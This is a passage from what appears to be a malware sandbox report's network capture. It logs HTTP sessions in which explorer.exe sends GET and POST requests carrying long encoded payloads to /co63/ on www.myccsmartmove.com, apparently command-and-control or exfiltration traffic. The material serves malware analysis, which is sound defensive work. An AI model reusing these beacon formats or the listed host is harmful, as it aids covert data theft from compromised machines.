                                                      Jul 20, 2023 11:45:36.406203032 CEST560OUTData Raw: 6c 64 35 45 7a 45 58 50 62 75 76 74 6c 71 73 68 4c 67 73 41 62 36 6e 36 4d 39 69 5a 33 64 69 74 70 66 5a 4d 4a 4a 6a 61 43 79 43 77 6c 75 32 71 4a 59 38 32 6c 74 6d 68 67 73 62 61 38 50 43 6f 39 4f 67 77 30 36 72 2d 61 4f 61 72 39 44 46 33 46 43
                                                      Data Ascii: ld5EzEXPbuvtlqshLgsAb6n6M9iZ3ditpfZMJJjaCyCwlu2qJY82ltmhgsba8PCo9Ogw06r-aOar9DF3FCi_5Sbp9ti_EZ2-L7zScPpg0qiyAO16b7jOhstY2SI8ymxbL6Cau8QLq1YTLz3wAnBKx4VBJ4Sux0bURrtQWGPHDivGQUJF9eMPpBhswQh3yA32K9FAvcsXhgpZqIr55t1qZsEKy_mgjYULgl4Nh7oPR9bHPwuK2fZ
                                                      Jul 20, 2023 11:45:36.414805889 CEST568OUTData Raw: 4e 45 47 6f 78 64 77 6a 48 38 43 68 6a 5a 74 6d 34 52 49 4c 7e 75 67 5a 41 6a 52 63 41 75 59 52 65 5f 41 76 32 50 52 35 68 5a 52 75 45 69 36 67 30 61 35 61 45 4d 37 65 62 73 41 58 58 78 30 49 45 35 33 61 30 77 72 6d 43 72 36 63 33 59 35 70 55 56
                                                      Data Ascii: NEGoxdwjH8ChjZtm4RIL~ugZAjRcAuYRe_Av2PR5hZRuEi6g0a5aEM7ebsAXXx0IE53a0wrmCr6c3Y5pUVldUIUpkUMdfGqKG30EWwTCU3wXvCOzndJeOVyQ(1NarGR8KTKozPQly59JRw6FsXeAW0A3SQJyvxz6QHBXDRlTlhsQ7-QCI1h4MzEz(Ml4ZTPZCs3uuiUyvaGBJqQxbsOirk7ut-VbELFrQ8DpVImA2XBlMPDGC9Q
                                                      Jul 20, 2023 11:45:36.414805889 CEST571OUTData Raw: 32 70 49 31 69 37 72 48 62 55 52 59 67 52 6f 4d 69 68 36 76 4f 57 58 56 4e 52 31 43 38 59 44 4f 6e 66 52 55 47 49 37 34 53 48 54 30 47 38 33 6e 37 39 57 4c 53 64 50 47 65 41 4c 4c 47 71 75 62 59 55 61 38 4b 63 59 73 46 55 34 39 73 73 54 50 78 63
                                                      Data Ascii: 2pI1i7rHbURYgRoMih6vOWXVNR1C8YDOnfRUGI74SHT0G83n79WLSdPGeALLGqubYUa8KcYsFU49ssTPxcVwCnNiKtVAXnel~0HBe9sxCaQyDRN4nR2k3RATn-9i~1HiutDteGdr2D(zO9FR2BMwyhw3D0rd6tkP5JTZjo(Lwx6_PjaYMJYppZoSViR6kAteO-~Az6iaQIx1~g(zuBaXlQHFcxHeWCaZJ3Pn95eTGc6bSerPFIW
                                                      Jul 20, 2023 11:45:36.496334076 CEST642INHTTP/1.1 405 Method Not Allowed
                                                      Server: openresty
                                                      Date: Thu, 20 Jul 2023 09:45:36 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 154
                                                      X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_R/ex/bZytcrn+mdS8YhV4IEoSKT9oNHNKUPqIjguyZiSsiUtRdiujE/fk+SgLzGG0HDyRB3Uyq6OtQGUGIBFfQ
                                                      Via: 1.1 google
                                                      Connection: close
                                                      Jul 20, 2023 11:45:36.497956991 CEST642INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41
                                                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                      12192.168.2.54972376.223.26.9680C:\Windows\explorer.exe
                                                      TimestampkBytes transferredDirectionData
                                                      Jul 20, 2023 11:45:54.735474110 CEST644OUTGET /co63/?aJElwV=McyR/z78/oMNrvlFuqxD/V8JfWPC4TTnrx7QyB/aq5OEZJfdbD3j+IdLq+ssY6HN52vi&lz=9rXXjDMXIb6HXH- HTTP/1.1
                                                      Host: www.myccsmartmove.com
                                                      Connection: close
                                                      Data Raw: 00 00 00 00 00 00 00
                                                      Data Ascii:
                                                      Jul 20, 2023 11:45:54.776949883 CEST644INHTTP/1.1 403 Forbidden
                                                      Date: Thu, 20 Jul 2023 09:45:54 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 146
                                                      Connection: close
                                                      Server: nginx
                                                      Vary: Accept-Encoding
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                      13192.168.2.54972476.223.26.9680C:\Windows\explorer.exe
                                                      TimestampkBytes transferredDirectionData
                                                      Jul 20, 2023 11:45:56.827234030 CEST648OUTPOST /co63/ HTTP/1.1
                                                      Host: www.myccsmartmove.com
                                                      Connection: close
                                                      Content-Length: 1484
                                                      Cache-Control: no-cache
                                                      Origin: http://www.myccsmartmove.com
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Accept: */*
                                                      Referer: http://www.myccsmartmove.com/co63/
                                                      Accept-Language: en-US
                                                      Accept-Encoding: gzip, deflate
                                                      Data Raw: 61 4a 45 6c 77 56 3d 45 2d 7e 72 68 57 48 51 69 70 63 2d 32 73 6b 6a 38 39 55 6f 6b 77 74 6e 56 6a 57 54 31 43 54 58 39 57 37 56 6a 52 54 31 37 4d 61 63 66 59 54 68 4b 42 75 39 30 49 63 38 36 49 49 4f 62 61 33 71 6b 78 54 68 72 6c 47 63 5a 4c 7a 51 76 77 57 53 68 62 46 34 4a 54 6c 30 62 62 6e 72 7a 6d 41 56 35 70 4b 6f 53 56 76 6b 31 7a 59 6c 6c 59 4c 73 52 56 79 71 4e 72 48 78 4c 4b 31 61 6c 4d 43 57 42 39 45 37 32 42 77 42 4c 58 44 4c 6d 33 78 34 41 44 38 6f 71 73 68 79 59 56 64 6e 49 56 4b 41 65 30 71 44 76 61 4d 31 6d 56 6e 4d 38 46 51 36 4d 30 56 49 67 75 4c 78 28 52 4b 34 4f 45 6c 37 53 6e 49 54 62 70 46 54 65 6e 66 4c 63 49 55 77 69 32 50 33 59 4a 79 51 4e 34 64 34 53 41 67 63 79 62 4c 66 78 5a 7e 73 5a 35 7e 6a 4e 50 44 6b 33 51 4e 6e 36 43 53 72 46 37 35 4b 6e 78 41 72 56 62 75 37 79 63 54 57 6e 76 55 56 6a 52 7e 4f 6e 5a 35 73 75 36 79 68 66 76 6f 53 41 57 52 65 76 59 52 5f 56 39 6e 57 35 72 6c 30 38 47 6c 6b 6c 70 58 6f 54 64 43 69 6d 54 46 39 79 6e 43 77 4a 36 64 68 50 69 50 4a 42 74 71 33 75 7a 45 37 49 78 35 72 35 65 36 38 53 69 37 42 4f 53 57 4b 31 51 51 67 31 77 4e 47 33 2d 61 73 5a 52 44 73 5a 65 30 31 55 58 30 57 37 4f 50 4f 33 72 4a 79 32 44 57 65 64 6b 63 6d 32 77 6d 69 7a 62 74 6f 31 67 31 50 74 67 4f 77 34 71 61 74 47 64 65 4d 32 45 57 48 73 75 39 46 6b 43 69 64 35 54 34 75 46 33 41 6e 4e 72 77 67 63 58 73 79 72 75 54 46 64 46 71 63 31 77 69 33 4a 65 6c 39 62 79 49 43 72 33 56 36 30 4a 4b 2d 41 75 74 36 41 5a 50 31 35 65 69 59 6f 46 4f 70 72 65 4b 48 63 37 50 38 42 62 56 53 32 36 28 72 38 44 39 66 43 4a 7e 4e 31 54 70 54 54 47 43 61 66 67 57 69 35 62 46 5f 71 59 38 32 72 72 74 4f 55 76 74 37 47 30 39 32 67 5f 6f 64 4e 47 49 4c 63 39 76 75 71 58 69 4a 37 52 54 70 32 38 4c 4e 77 30 50 74 78 6d 6a 79 36 79 64 77 28 75 39 64 45 37 31 51 77 30 5a 43 67 32 72 6d 48 42 6a 36 4c 66 37 33 54 35 77 57 6c 4e 52 37 5a 7a 38 56 4c 32 4b 4e 59 2d 37 78 64 51 68 6b 58 2d 30 50 72 56 68 70 66 4e 50 46 4b 45 37 6e 51 38 4a 59 54 35 33 4e 55 57 7e 33 37 4f 76 79 77 4c 73 56 6b 36 30 5a 6c 37 4a 62 65 2d 7a 66 58 72 6f 64 32 6b 6b 34 55 37 6e 4e 53 4d 47 76 54 39 59 32 4a 61 77 53 7a 70 45 78 6e 54 69 35 56 53 48 4c 34 72 4b 4d 64 30 66 68 55 64 75 72 69 66 59 50 42 67 47 4f 46 6f 28 4d 33 58 59 66 7a 4b 4f 39 55 72 50 36 38 48 30 6a 61 36 50 42 6d 66 67 75 28 5f 4b 36 7e 65 6d 53 55 78 53 59 43 73 50 78 53 63 31 59 73 31 63 39 4d 75 49 78 62 44 78 67 47 30 4f 36 6b 4e 31 4d 6c 31 57 31 6d 52 70 71 7e 32 6c 50 58 52 6a 65 4c 37 35 66 78 6e 75 4c 28 66 46 4f 47 73 57 79 73 64 4a 43 59 48 7e 69 67 77 4f 4f 7e 58 30 2d 6c 35 5a 6a 6c 57 52 77 4b 63 79 42 4e 72 33 55 4b 47 4f 6d 4c 39 4e 75 4a 73 38 48 50 69 75 73 56 2d 57 41 64 4c 66 4b 57 43 44 77 41 78 4f 57 48 69 33 4e 73 48 4f 76 42 30 56 36 6b 5f 4e 6a 47 78 44 56 31 74 77 48 74 6c 75 4b 59 74 64 4b 43 63 61 59 4d 48 76 35 6a 73 71 53 77 62 6a 6c 45 46 66 41 28 58 41 6c 75 72 37 4c 42 53 4d 4e 54 36 4e 4f 4a 58 28 58 36 78 62 63 77 57 4b 43 53 4b 4d 34 49 61 5a 4c 77 67 56 54 57 79 34 75 32 68 65 35 7a 6a 45 69 4a 35 7e 4d 66 38 72 78 49 44 34 5f 76 4c 36 45 68 73 7a 39 53 30 33 46 50 49 4e 4d 52 44 4a 4a 32 2d 6e 5a 32 68 53 7a 4d 5f 67 4c 38 51 57 72 43 6a 76 5f 7a 37 30 34 70 4b 61 4c 55 52 54 5f 63 76 67 63 6d 6f 33 75 38 54 6a 71 7e 6d 73 7a 36 64 70 44 55 35 75 4f 76 70 56 6a 78 62 36 64 4d 48 69 39 28 41 6c 6e 50 6b 74 74 68 55 56 4b 72 73 76 50 42 57 35 4a 30 4a 73 41 6e 67 47 34 49 6a 72 51 39 78 53 52 30 66 44 61 6d 72 44 76 31 75 31 64 59 6c 37 4d 4a 66 7a 2d 6e 55 55 4f 78 32 35 65 64 76 59 39 70 44 30 33 73 59 44 69 75 46 6b 64 66 66 67 4b 43 32 33 48 4e 43 63 59 44 42 72 7a 61 39 4e 53 6d 35 38 66 53 69 70 51 72 50 6b 49 69 7a 36 72 4c 79 35 5f 52 6c 4b 79 61 76 45 4c 7a 67 72 74 54 42 33 7a 79 69 6f 48 64 30 6d 31 49 66 6a 43 65 4e 6a 38 42 34 71 68 4c 63 76 33 30 56 75 6f 4e 48 63 30 58 6c 36 68 51 32 71 4a 34 5a 33 50 7e 6b 69 52 34 44 41 55 74 2d 36 4c 42 59 31 33 4f 6d 5a 4d 61 5f 51 59 79 68 66 6b 72 4b 77 56 48 33 7e 61 59 31 56 61 79 39 57 77 38 61 47 33 50 77 4b 30 67 75 7a 44 35 61 47 4c 69 43 35 5a 38 73 49 79 7a 72 4a 45 75 6d 54 76
                                                      Data Ascii: aJElwV=E-~rhWHQipc-2skj89UokwtnVjWT1CTX9W7VjRT17MacfYThKBu90Ic86IIOba3qkxThrlGcZLzQvwWShbF4JTl0bbnrzmAV5pKoSVvk1zYllYLsRVyqNrHxLK1alMCWB9E72BwBLXDLm3x4AD8oqshyYVdnIVKAe0qDvaM1mVnM8FQ6M0VIguLx(RK4OEl7SnITbpFTenfLcIUwi2P3YJyQN4d4SAgcybLfxZ~sZ5~jNPDk3QNn6CSrF75KnxArVbu7ycTWnvUVjR~OnZ5su6yhfvoSAWRevYR_V9nW5rl08GlklpXoTdCimTF9ynCwJ6dhPiPJBtq3uzE7Ix5r5e68Si7BOSWK1QQg1wNG3-asZRDsZe01UX0W7OPO3rJy2DWedkcm2wmizbto1g1PtgOw4qatGdeM2EWHsu9FkCid5T4uF3AnNrwgcXsyruTFdFqc1wi3Jel9byICr3V60JK-Aut6AZP15eiYoFOpreKHc7P8BbVS26(r8D9fCJ~N1TpTTGCafgWi5bF_qY82rrtOUvt7G092g_odNGILc9vuqXiJ7RTp28LNw0Ptxmjy6ydw(u9dE71Qw0ZCg2rmHBj6Lf73T5wWlNR7Zz8VL2KNY-7xdQhkX-0PrVhpfNPFKE7nQ8JYT53NUW~37OvywLsVk60Zl7Jbe-zfXrod2kk4U7nNSMGvT9Y2JawSzpExnTi5VSHL4rKMd0fhUdurifYPBgGOFo(M3XYfzKO9UrP68H0ja6PBmfgu(_K6~emSUxSYCsPxSc1Ys1c9MuIxbDxgG0O6kN1Ml1W1mRpq~2lPXRjeL75fxnuL(fFOGsWysdJCYH~igwOO~X0-l5ZjlWRwKcyBNr3UKGOmL9NuJs8HPiusV-WAdLfKWCDwAxOWHi3NsHOvB0V6k_NjGxDV1twHtluKYtdKCcaYMHv5jsqSwbjlEFfA(XAlur7LBSMNT6NOJX(X6xbcwWKCSKM4IaZLwgVTWy4u2he5zjEiJ5~Mf8rxID4_vL6Ehsz9S03FPINMRDJJ2-nZ2hSzM_gL8QWrCjv_z704pKaLURT_cvgcmo3u8Tjq~msz6dpDU5uOvpVjxb6dMHi9(AlnPktthUVKrsvPBW5J0JsAngG4IjrQ9xSR0fDamrDv1u1dYl7MJfz-nUUOx25edvY9pD03sYDiuFkdffgKC23HNCcYDBrza9NSm58fSipQrPkIiz6rLy5_RlKyavELzgrtTB3zyioHd0m1IfjCeNj8B4qhLcv30VuoNHc0Xl6hQ2qJ4Z3P~kiR4DAUt-6LBY13OmZMa_QYyhfkrKwVH3~aY1Vay9Ww8aG3PwK0guzD5aGLiC5Z8sIyzrJEumTvekM8UM1iCSmMlRjG3e~Mo7~qpeqBRASvEgzxh40LwzoaHrYEl8Pv3T5i3PsV3K93sJR5w4uMoNO7MmTVpyJQzS2EbzER0-B1~u1yaUT8UuhMO8o0BShCew).YrZjYDH


                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                      14192.168.2.54972576.223.26.9680C:\Windows\explorer.exe
                                                      TimestampkBytes transferredDirectionData
                                                      Jul 20, 2023 11:45:56.851581097 CEST661OUTPOST /co63/ HTTP/1.1
                                                      Host: www.myccsmartmove.com
                                                      Connection: close
                                                      Content-Length: 151296
                                                      Cache-Control: no-cache
                                                      Origin: http://www.myccsmartmove.com
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Accept: */*
                                                      Referer: http://www.myccsmartmove.com/co63/
                                                      Accept-Language: en-US
                                                      Accept-Encoding: gzip, deflate
                                                      Data Raw: 61 4a 45 6c 77 56 3d 45 2d 7e 72 68 55 6e 63 78 4a 5a 79 79 75 78 45 6f 76 63 67 67 68 63 6f 65 45 76 54 34 79 61 6c 77 68 75 32 6a 52 6a 78 75 5a 47 4f 59 37 4c 68 64 54 48 30 36 49 63 37 34 49 49 4e 52 4b 36 64 34 79 53 75 72 6b 79 32 5a 4c 72 66 67 79 76 35 77 65 52 56 46 6a 59 50 54 36 43 72 33 6a 4d 57 35 4c 33 71 56 55 6e 6b 78 48 52 6a 70 71 54 33 58 68 43 6d 58 72 62 7a 45 72 64 54 79 50 6d 6a 44 66 49 5f 38 68 51 35 4a 6e 4c 63 6f 32 77 56 43 6c 68 6e 6e 34 4a 31 54 32 68 68 49 32 7e 79 53 52 4b 68 7a 4b 45 41 36 42 7a 53 7e 54 63 79 4d 31 52 31 70 4f 61 46 30 32 65 54 41 56 56 72 41 55 45 54 65 61 56 44 47 56 48 4a 5a 50 41 6f 68 6c 32 50 50 4b 36 31 64 73 52 37 63 7a 5a 55 31 59 76 50 28 63 47 66 62 37 65 6e 48 39 62 59 36 51 4a 75 7a 33 61 57 49 63 6c 45 6e 67 63 32 5a 35 37 34 74 4e 28 74 6c 63 59 42 73 67 65 79 72 61 31 53 76 4b 43 48 59 73 4a 45 4f 6c 6f 59 73 62 6f 69 49 74 72 36 37 72 74 34 6c 33 6c 63 6c 70 54 61 54 39 33 62 28 54 46 37 32 6b 32 66 4a 37 35 68 50 69 28 5a 42 59 32 33 75 53 31 68 4f 33 4e 75 32 2d 37 6b 52 79 72 57 45 41 79 42 31 51 67 76 31 41 46 47 6c 73 7e 73 4f 67 7a 72 4b 4f 30 31 4e 48 30 44 37 4f 50 47 33 72 49 6b 32 42 32 53 63 67 45 6d 69 44 79 61 79 75 78 6d 6b 44 70 6e 7a 51 4f 73 30 4c 62 70 4c 39 44 6a 32 44 7a 42 73 4f 5a 46 6c 57 61 65 38 79 49 71 44 6d 41 34 55 61 45 77 57 33 30 59 72 75 76 32 61 30 36 36 78 52 4f 6d 4f 65 6c 36 4f 53 55 56 76 79 35 63 67 4c 53 74 43 6f 73 66 54 64 66 54 35 2d 32 44 6f 69 4b 74 71 5a 69 54 58 66 76 4b 4b 49 35 47 6d 34 6e 63 34 43 51 4b 64 4e 75 63 30 7a 39 6c 55 6d 7a 6a 64 68 75 6f 35 74 67 71 74 35 35 33 6d 4b 67 70 4d 5f 41 67 51 6c 4e 5a 69 2d 67 77 43 79 49 6c 58 65 48 36 76 33 75 65 74 54 58 6c 7a 64 69 4c 32 47 44 6a 33 48 7a 7a 28 42 74 33 6d 75 52 49 46 37 35 50 68 6c 46 39 69 47 7e 78 44 33 50 4f 4e 5f 58 45 62 59 5a 7a 75 49 73 6f 50 6b 45 6f 59 33 57 67 52 36 33 70 66 41 38 43 46 64 73 36 76 77 68 41 55 4d 4b 69 66 52 47 6d 66 5f 5a 42 41 34 50 73 59 48 58 64 68 74 6a 6e 79 49 45 6f 31 36 41 67 69 2d 46 75 64 62 48 4f 45 65 67 6f 67 32 5a 65 4d 5f 65 51 49 4c 6d 66 54 65 38 49 59 59 35 43 70 62 6f 77 6f 54 47 43 51 77 48 57 39 49 33 30 4e 33 7a 64 62 50 79 51 67 6f 30 2d 49 51 57 56 46 66 54 70 33 58 67 44 7a 36 76 36 47 65 28 36 34 41 55 67 5a 5a 58 46 71 50 67 75 31 76 4b 69 77 2d 72 77 55 7a 75 59 42 70 50 78 48 5a 6c 57 73 31 63 6a 45 4b 49 56 62 7a 78 6e 48 78 69 5f 6b 4e 56 30 6c 33 37 39 33 68 55 58 70 42 42 49 64 68 6a 53 4e 35 42 59 78 6c 72 39 28 66 42 64 4d 50 7e 4e 74 74 41 56 53 58 7e 69 6d 79 43 67 31 44 51 37 67 2d 59 6b 73 57 77 6c 42 63 7e 58 44 5f 76 74 46 6d 47 67 42 75 74 75 52 39 34 4c 54 54 61 61 47 64 6e 4e 65 6f 57 45 4a 77 7a 6e 4f 41 4c 4f 55 67 62 4e 6e 33 36 57 4b 56 46 31 72 76 4e 4e 45 69 7a 34 35 4e 4e 4d 73 69 36 5f 66 5f 4a 52 49 4d 61 78 4b 58 4b 6f 34 38 7a 4f 34 70 57 38 55 45 44 69 6d 31 77 6d 76 59 32 4a 45 78 5a 6b 55 49 4a 56 41 31 50 5a 32 68 4f 4d 7a 57 6e 37 58 59 77 64 4c 37 78 42 35 67 68 69 61 57 30 2d 39 78 36 4a 78 57 55 74 46 34 43 31 52 5a 58 6a 46 6a 59 45 33 4a 4b 49 77 66 65 42 55 52 66 43 45 59 39 65 65 52 34 64 30 73 6e 38 33 57 4f 4c 41 66 45 76 78 7a 33 47 45 7a 72 65 6a 76 38 51 32 4a 37 58 5a 42 72 61 51 65 6c 6b 6e 5a 79 37 67 55 4b 32 31 48 6c 51 79 76 46 69 57 62 4f 50 77 70 35 41 7a 65 61 71 66 79 57 59 39 78 77 63 58 58 77 6d 32 30 39 35 70 2d 75 63 51 46 74 68 30 49 30 79 67 45 69 34 46 7a 37 51 76 47 75 52 37 50 48 5a 73 36 36 62 38 74 30 6c 56 51 4c 51 4f 65 28 36 6b 47 77 6c 77 53 5a 4d 48 4d 63 73 72 57 34 49 71 49 72 30 39 47 38 55 55 4d 4e 4d 49 58 43 78 50 54 67 73 4f 77 33 5a 63 72 52 6a 38 4c 46 50 55 48 35 48 7e 61 30 79 6c 77 47 57 62 56 6f 6b 49 48 50 41 5a 75 35 56 39 52 76 4d 62 6b 50 4f 76 51 67 33 65 6b 4f 4d 4e 38 62 48 5a 74 69 37 46 4c 71 69 41 2d 76 51 28 45 47 53 49 33 6b 79 4b 6d 54 54 57 6b 69 49 34 5a 66 32 7a 51 4f 4c 6e 57 74 6f 6e 66 37 33 47 70 5a 55 5a 54 73 5f 55 4a 64 5f 74 32 7a 55 75 5a 45 38 43 6c 65 54 56 78 56 36 36 63 76 4e 36 37 69 51 57 44 69 50 6d 4d 48 61 79 59 65 46 68 41 31 56 32 39 63 6e 75 63 42 51 74 68 43 79
                                                      Data Ascii: aJElwV=E-~rhUncxJZyyuxEovcgghcoeEvT4yalwhu2jRjxuZGOY7LhdTH06Ic74IINRK6d4ySurky2ZLrfgyv5weRVFjYPT6Cr3jMW5L3qVUnkxHRjpqT3XhCmXrbzErdTyPmjDfI_8hQ5JnLco2wVClhnn4J1T2hhI2~ySRKhzKEA6BzS~TcyM1R1pOaF02eTAVVrAUETeaVDGVHJZPAohl2PPK61dsR7czZU1YvP(cGfb7enH9bY6QJuz3aWIclEngc2Z574tN(tlcYBsgeyra1SvKCHYsJEOloYsboiItr67rt4l3lclpTaT93b(TF72k2fJ75hPi(ZBY23uS1hO3Nu2-7kRyrWEAyB1Qgv1AFGls~sOgzrKO01NH0D7OPG3rIk2B2ScgEmiDyayuxmkDpnzQOs0LbpL9Dj2DzBsOZFlWae8yIqDmA4UaEwW30Yruv2a066xROmOel6OSUVvy5cgLStCosfTdfT5-2DoiKtqZiTXfvKKI5Gm4nc4CQKdNuc0z9lUmzjdhuo5tgqt553mKgpM_AgQlNZi-gwCyIlXeH6v3uetTXlzdiL2GDj3Hzz(Bt3muRIF75PhlF9iG~xD3PON_XEbYZzuIsoPkEoY3WgR63pfA8CFds6vwhAUMKifRGmf_ZBA4PsYHXdhtjnyIEo16Agi-FudbHOEegog2ZeM_eQILmfTe8IYY5CpbowoTGCQwHW9I30N3zdbPyQgo0-IQWVFfTp3XgDz6v6Ge(64AUgZZXFqPgu1vKiw-rwUzuYBpPxHZlWs1cjEKIVbzxnHxi_kNV0l3793hUXpBBIdhjSN5BYxlr9(fBdMP~NttAVSX~imyCg1DQ7g-YksWwlBc~XD_vtFmGgButuR94LTTaaGdnNeoWEJwznOALOUgbNn36WKVF1rvNNEiz45NNMsi6_f_JRIMaxKXKo48zO4pW8UEDim1wmvY2JExZkUIJVA1PZ2hOMzWn7XYwdL7xB5ghiaW0-9x6JxWUtF4C1RZXjFjYE3JKIwfeBURfCEY9eeR4d0sn83WOLAfEvxz3GEzrejv8Q2J7XZBraQelknZy7gUK21HlQyvFiWbOPwp5AzeaqfyWY9xwcXXwm2095p-ucQFth0I0ygEi4Fz7QvGuR7PHZs66b8t0lVQLQOe(6kGwlwSZMHMcsrW4IqIr09G8UUMNMIXCxPTgsOw3ZcrRj8LFPUH5H~a0ylwGWbVokIHPAZu5V9RvMbkPOvQg3ekOMN8bHZti7FLqiA-vQ(EGSI3kyKmTTWkiI4Zf2zQOLnWtonf73GpZUZTs_UJd_t2zUuZE8CleTVxV66cvN67iQWDiPmMHayYeFhA1V29cnucBQthCyfmZtfsV9Sh~-9An9(NuMhoeR0LiHBS7IIgjxrvlIwCcfCNxR9dKTlAo3qdFFwr1mr5Qf~Z26j-u8OU(qmWtPygq2bzcS3Pth(sQKeEn-DuEWbN1mFw0rO4imKUAMWH6od_Cjt730BSqmvenDBcYUIy588f4WPsUeQTudGygkMr3H7SfAgdVX7oP66ihCnBXq~Jgmcja2ooagWNC9Las49UB1dlf5wb(1S3Bs2eTZ1ORSl5XZbD(-0LUIcGGvpgMWKFUBRpiouFzF5dfqku0aJpbbqbT1qCq6EWTHV8RUdXcSeLRLbCLnMYH3QiQ8bpJOtI(zl8ve4oqEPWGAhgi4YHwW1eB3RpzXNrRkFL6GiUuvTVaHNW1IipX6DXH4USQEvZBNeD9FIgQxOqDw7L8ptrvVfPH9coalMfX555aeGVsa3fliy14TAnKMM2SYHkBlTH4dxc2k5OUFDxSy8Q0cTU3uQVygx-zZr6pGSxPhvgTWRYdubQxIT1wf1gix7r71XXpzp_(hAl~OpfucT3YjX60TzqQ6KRBTIeEfJ1aDuBgYS8FNMdhfyRCH1fsHoaB_4HMalUDX4PvI8dbprY3NFCgK05ea9hEcgsksXNaIxr9cXgNnqXqx1ZT6B1VKIdEkdGS2MCDzYin1Jvv1Fo9aCYqH8APBjriRTQz5b87FcbYbNNTEfmebsLxGtsPd7RpvyAhoZUsCQPe8jqSaxFJGciVSmWUnJJDROx17T9nmYSva5UrVyG(QBYlLNplh~Kk0DYgnFInjGaCBN_v1lIW1~dvT(zvXfSFetCtJWjzmN_Z9wjZC5uusqkwZw69-9rahv2Gt8gkVruN1l_LDKjOCZhn3ZMi3h6n5eRWrwiVfE18yP_1_oecwsE3tHvSebXBatzKkqQ5Nq2kcBBcgRyOwvTgRQGItfaPcG4RS2g2ZtgWYRCuME_6vAIFeMvNbjF6-Tu3hyi61r7OM73yvpWmiuHDEvAq_f68xuAfr0esXCkJ7q3NCnLSOkpeDsLr2WDnOWjeyS9Ki~NRvvP15wFvEQzu3E3UyXAza3uafiX~HRZTssOYOPiB8PlsNsHJG9x(XnQrH7e0SZQ1Oyzhc3ybnwWWLa-GYSeuHeSKn8J5uTpzvoEuwLslgyQx4pkNRlJFqgHKaP-AhQXFGJ5pLlPq8v3wOAsVB65EDKgFOY9(x9FQMDUBwIL1bXFKxMsLrrSGU(Y9RV8LHSdmn(51wL13GMU54LsFbp_VdxX~IUgprEKp0FVnXuW0b3hBDK92a5V9XbIm9i-Scx4HkGVGjCjrpNN57wwseLTjDfzeELMEj8RHCXHJiIXP1C69iRi1H~4Jqho5x14wBNPCcxsKyfM~-DboniuTbMmOso9fUyJDksNpllnK9DlHX6ykgFV01O-Ef6PaSYVQ_Eqny6q32EK(rNTJQga9CVJFlfy2YhCMwWC6k7U5HahnkFrz3mMklYVPwX3aHIocDxR~YkG94SjNyb9~bSoslWMVcSiJB5RCIZ_xClZYyA2Myn65-xGNC5-ZAGkCp~dLH9IWB7cmpfS4IVBGaSrwJLJHEsKAAXYJtVvaBXnQU16sgK1CWNNrLl0Dj4X~5UTQxi43-wq2S9c~CwQlhVd0e83PpAyPngPIygiE7SmtC77OHZ0fqNQFvQ4bUX0OVmgTp3Hcl4t4ibeExnXuwcyuOuZJo~VXgma(bEtdTg5LIRWu4520-gfF_NsKLrkb5X5VZFlaATiiy(-753Rzuozy94M9AH6jQAZTaiLmfNe0UXGgNAur5VGxtTCvdS8YOQkokTq9alEm34vjlOqdjRUvVXIotg2v9~wCmrOEsthx_h-vAluuturoUl_xrKdNcIO(VO_WKxMF32tGcvjARKuyhJVLr1892utxC(zX4MPvKiR9srQW3~BIVGNdD(XpQBjst~aQf3FaUFt4qV9frb0pmZjKEdbLOSMU_F4If1Hn2VOjYYN6Zd3LwOumnY4AvnUAHuN7wJGNtGcPEh1aouIf6ZMjr1SdQW8wLpbgtHkx21gfrFY5rILXMmklAyyo1mzsmgLTmo_3-Nqz7nJ27x05SvUKp2FfVVBZWHjez~oyHMdRr92Ys0CMbwx3J(dO3XiIUOkfj0RK12N9a3UtcWkhx2r(DXT4z02Ih81k3tZWtgNNHmXsygswjPqol0CMu~xNgEL6RhakzMRQ2lVDcPb9H3lZSYVRkabZxgLtjENudzJyNEa1QAO13Cphg2MYafSKsfcFrJwk8eg71A_JIv3XUEbSPaVY_qhAeLTzLbBgjO9eHfRzJqrNJ4y23aEMs4jR5OpGhy3O7OaDd(0mZCEPgaKreS-hOpA9cQkQf2yBA85Gl1_6Ju53Wwe308qG5nPxOt4vTsZZL84MqFfus(ULXQm8eU9t6DdUS(2dOKz30avXn8KDSVgQnD1EjQjeGh230DF3oS_D8AHgNP2oTiQ6X5ObsmP8jk5FQAsV3l7UEab5MJAJ1ZL1J91X_hNRBYJnCVVBnrDOWqPugEXD_GsF7hD7X5wJClrUN~JosYzhAfbXi7Nx4obHGV6M-sx(tScoUl9Ihw8uJMCTFd